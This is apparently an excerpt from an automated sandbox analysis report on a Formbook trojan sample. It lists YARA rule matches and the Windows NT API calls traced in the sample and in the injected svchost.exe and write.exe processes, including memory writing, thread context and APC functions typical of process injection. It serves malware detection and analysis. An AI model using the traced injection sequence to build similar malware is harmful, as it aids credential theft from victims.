            Source: 00000002.00000002.2563714383.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2564107647.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.3361592338.0000000004D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.3361654877.0000000004DA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3360961972.0000000002E00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C3B3 NtClose,2_2_0042C3B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872B60 NtClose,LdrInitializeThunk,2_2_03872B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03872DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03872C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038735C0 NtCreateMutant,LdrInitializeThunk,2_2_038735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03874340 NtSetContextThread,2_2_03874340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03874650 NtSuspendThread,2_2_03874650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872B80 NtQueryInformationFile,2_2_03872B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872BA0 NtEnumerateValueKey,2_2_03872BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872BE0 NtQueryValueKey,2_2_03872BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872BF0 NtAllocateVirtualMemory,2_2_03872BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872AB0 NtWaitForSingleObject,2_2_03872AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872AD0 NtReadFile,2_2_03872AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872AF0 NtWriteFile,2_2_03872AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872F90 NtProtectVirtualMemory,2_2_03872F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872FA0 NtQuerySection,2_2_03872FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872FB0 NtResumeThread,2_2_03872FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872FE0 NtCreateFile,2_2_03872FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872F30 NtCreateSection,2_2_03872F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872F60 NtCreateProcessEx,2_2_03872F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872E80 NtReadVirtualMemory,2_2_03872E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872EA0 NtAdjustPrivilegesToken,2_2_03872EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872EE0 NtQueueApcThread,2_2_03872EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872E30 NtWriteVirtualMemory,2_2_03872E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872DB0 NtEnumerateKey,2_2_03872DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872DD0 NtDelayExecution,2_2_03872DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872D00 NtSetInformationFile,2_2_03872D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872D10 NtMapViewOfSection,2_2_03872D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872D30 NtUnmapViewOfSection,2_2_03872D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872CA0 NtQueryInformationToken,2_2_03872CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872CC0 NtQueryVirtualMemory,2_2_03872CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872CF0 NtOpenProcess,2_2_03872CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872C00 NtQueryInformationProcess,2_2_03872C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872C60 NtCreateKey,2_2_03872C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03873090 NtSetValueKey,2_2_03873090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03873010 NtOpenDirectoryObject,2_2_03873010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038739B0 NtGetContextThread,2_2_038739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03873D10 NtOpenProcessToken,2_2_03873D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03873D70 NtOpenThread,2_2_03873D70
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05034650 NtSuspendThread,LdrInitializeThunk,8_2_05034650
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05034340 NtSetContextThread,LdrInitializeThunk,8_2_05034340
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05032D10 NtMapViewOfSection,LdrInitializeThunk,8_2_05032D10
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05032D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_05032D30
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05032DD0 NtDelayExecution,LdrInitializeThunk,8_2_05032DD0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05032DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_05032DF0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05032C60 NtCreateKey,LdrInitializeThunk,8_2_05032C60
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05032C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_05032C70
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05032CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_05032CA0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05032F30 NtCreateSection,LdrInitializeThunk,8_2_05032F30
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05032FB0 NtResumeThread,LdrInitializeThunk,8_2_05032FB0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05032FE0 NtCreateFile,LdrInitializeThunk,8_2_05032FE0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05032E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_05032E80
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05032EE0 NtQueueApcThread,LdrInitializeThunk,8_2_05032EE0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05032B60 NtClose,LdrInitializeThunk,8_2_05032B60
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05032BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_05032BA0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05032BE0 NtQueryValueKey,LdrInitializeThunk,8_2_05032BE0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05032BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_05032BF0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05032AD0 NtReadFile,LdrInitializeThunk,8_2_05032AD0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05032AF0 NtWriteFile,LdrInitializeThunk,8_2_05032AF0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050335C0 NtCreateMutant,LdrInitializeThunk,8_2_050335C0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050339B0 NtGetContextThread,LdrInitializeThunk,8_2_050339B0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05032D00 NtSetInformationFile,8_2_05032D00
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05032DB0 NtEnumerateKey,8_2_05032DB0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05032C00 NtQueryInformationProcess,8_2_05032C00
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05032CC0 NtQueryVirtualMemory,8_2_05032CC0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05032CF0 NtOpenProcess,8_2_05032CF0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05032F60 NtCreateProcessEx,8_2_05032F60
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05032F90 NtProtectVirtualMemory,8_2_05032F90
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05032FA0 NtQuerySection,8_2_05032FA0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05032E30 NtWriteVirtualMemory,8_2_05032E30
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05032EA0 NtAdjustPrivilegesToken,8_2_05032EA0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05032B80 NtQueryInformationFile,8_2_05032B80
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05032AB0 NtWaitForSingleObject,8_2_05032AB0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05033010 NtOpenDirectoryObject,8_2_05033010
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05033090 NtSetValueKey,8_2_05033090
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05033D10 NtOpenProcessToken,8_2_05033D10
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05033D70 NtOpenThread,8_2_05033D70
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_03118F20 NtReadFile,8_2_03118F20
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_03118DB0 NtCreateFile,8_2_03118DB0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_03119210 NtAllocateVirtualMemory,8_2_03119210
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_03119010 NtDeleteFile,8_2_03119010
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_031190B0 NtClose,8_2_031190B0
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_004096A00_2_004096A0
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_0042200C0_2_0042200C
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_0041A2170_2_0041A217
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_004122160_2_00412216
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_0042435D0_2_0042435D
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_004033C00_2_004033C0
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_004125E80_2_004125E8
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_0044663B0_2_0044663B
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_004138010_2_00413801
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_0042096F0_2_0042096F
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_004129D00_2_004129D0
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_004119E30_2_004119E3
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_0041C9AE0_2_0041C9AE
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_0047EA6F0_2_0047EA6F
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_0040FA100_2_0040FA10
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_0044EB5F0_2_0044EB5F
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_00423C810_2_00423C81
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_00411E780_2_00411E78
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_00442E0C0_2_00442E0C
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_00420EC00_2_00420EC0
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_0044CF170_2_0044CF17
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_00444FD20_2_00444FD2
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_03F52B600_2_03F52B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004183F32_2_004183F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004030902_2_00403090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042E9B32_2_0042E9B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402BCE2_2_00402BCE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402BD02_2_00402BD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FCC32_2_0040FCC3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FCBA2_2_0040FCBA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004165DE2_2_004165DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004165E32_2_004165E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FEE32_2_0040FEE3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DF632_2_0040DF63
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E3F02_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039003E62_2_039003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FA3522_2_038FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C02C02_2_038C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E02742_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039001AA2_2_039001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F81CC2_2_038F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038301002_2_03830100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA1182_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C81582_2_038C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D20002_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383C7C02_2_0383C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038647502_2_03864750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038407702_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385C6E02_2_0385C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039005912_2_03900591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038405352_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EE4F62_2_038EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F24462_2_038F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F6BD72_2_038F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FAB402_2_038FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA802_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A02_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390A9A62_2_0390A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038569622_2_03856962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038268B82_2_038268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E8F02_2_0386E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384A8402_2_0384A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038428402_2_03842840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BEFA02_2_038BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03832FC82_2_03832FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384CFE02_2_0384CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03882F282_2_03882F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03860F302_2_03860F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B4F402_2_038B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852E902_2_03852E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FCE932_2_038FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FEEDB2_2_038FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FEE262_2_038FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840E592_2_03840E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03858DBF2_2_03858DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383ADE02_2_0383ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384AD002_2_0384AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DCD1F2_2_038DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0CB52_2_038E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830CF22_2_03830CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840C002_2_03840C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0388739A2_2_0388739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F132D2_2_038F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382D34C2_2_0382D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038452A02_2_038452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385B2C02_2_0385B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E12ED2_2_038E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384B1B02_2_0384B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387516C2_2_0387516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F1722_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390B16B2_2_0390B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EF0CC2_2_038EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C02_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F70E92_2_038F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FF0E02_2_038FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FF7B02_2_038FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F16CC2_2_038F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DD5B02_2_038DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F75712_2_038F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FF43F2_2_038FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038314602_2_03831460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385FB802_2_0385FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B5BF02_2_038B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387DBF92_2_0387DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FFB762_2_038FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DDAAC2_2_038DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03885AA02_2_03885AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E1AA32_2_038E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EDAC62_2_038EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FFA492_2_038FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F7A462_2_038F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B3A6C2_2_038B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D59102_2_038D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038499502_2_03849950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385B9502_2_0385B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038438E02_2_038438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AD8002_2_038AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03841F922_2_03841F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FFFB12_2_038FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FFF092_2_038FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03849EB02_2_03849EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385FDC02_2_0385FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03843D402_2_03843D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F1D5A2_2_038F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F7D732_2_038F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FFCF22_2_038FFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B9C322_2_038B9C32
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeCode function: 7_2_02ED04EC7_2_02ED04EC
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeCode function: 7_2_02ED229C7_2_02ED229C
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeCode function: 7_2_02ED22937_2_02ED2293
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeCode function: 7_2_02ED8BBC7_2_02ED8BBC
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeCode function: 7_2_02ED8BB77_2_02ED8BB7
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeCode function: 7_2_02EDA9CC7_2_02EDA9CC
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeCode function: 7_2_02EF0F8C7_2_02EF0F8C
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeCode function: 7_2_02ED24BC7_2_02ED24BC
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeCode function: 7_2_02ED053C7_2_02ED053C
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050005358_2_05000535
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050C05918_2_050C0591
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050A44208_2_050A4420
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050B24468_2_050B2446
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050AE4F68_2_050AE4F6
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050247508_2_05024750
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050007708_2_05000770
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_04FFC7C08_2_04FFC7C0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_0501C6E08_2_0501C6E0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_0509A1188_2_0509A118
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050881588_2_05088158
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050C01AA8_2_050C01AA
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050B41A28_2_050B41A2
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050B81CC8_2_050B81CC
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050920008_2_05092000
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_04FF01008_2_04FF0100
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050BA3528_2_050BA352
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050C03E68_2_050C03E6
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_0500E3F08_2_0500E3F0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050A02748_2_050A0274
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050802C08_2_050802C0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_0500AD008_2_0500AD00
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_04FF0CF28_2_04FF0CF2
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_0509CD1F8_2_0509CD1F
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05018DBF8_2_05018DBF
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05000C008_2_05000C00
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_04FFADE08_2_04FFADE0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050A0CB58_2_050A0CB5
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05042F288_2_05042F28
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05020F308_2_05020F30
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050A2F308_2_050A2F30
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05074F408_2_05074F40
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_0507EFA08_2_0507EFA0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_0500CFE08_2_0500CFE0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050BEE268_2_050BEE26
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_04FF2FC88_2_04FF2FC8
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05000E598_2_05000E59
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_05012E908_2_05012E90
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050BCE938_2_050BCE93
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050BEEDB8_2_050BEEDB
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_04FE68B88_2_04FE68B8
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050169628_2_05016962
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050029A08_2_050029A0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050CA9A68_2_050CA9A6
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_0500A8408_2_0500A840
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050028408_2_05002840
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_0502E8F08_2_0502E8F0
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_050BAB408_2_050BAB40
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_04FFEA808_2_04FFEA80
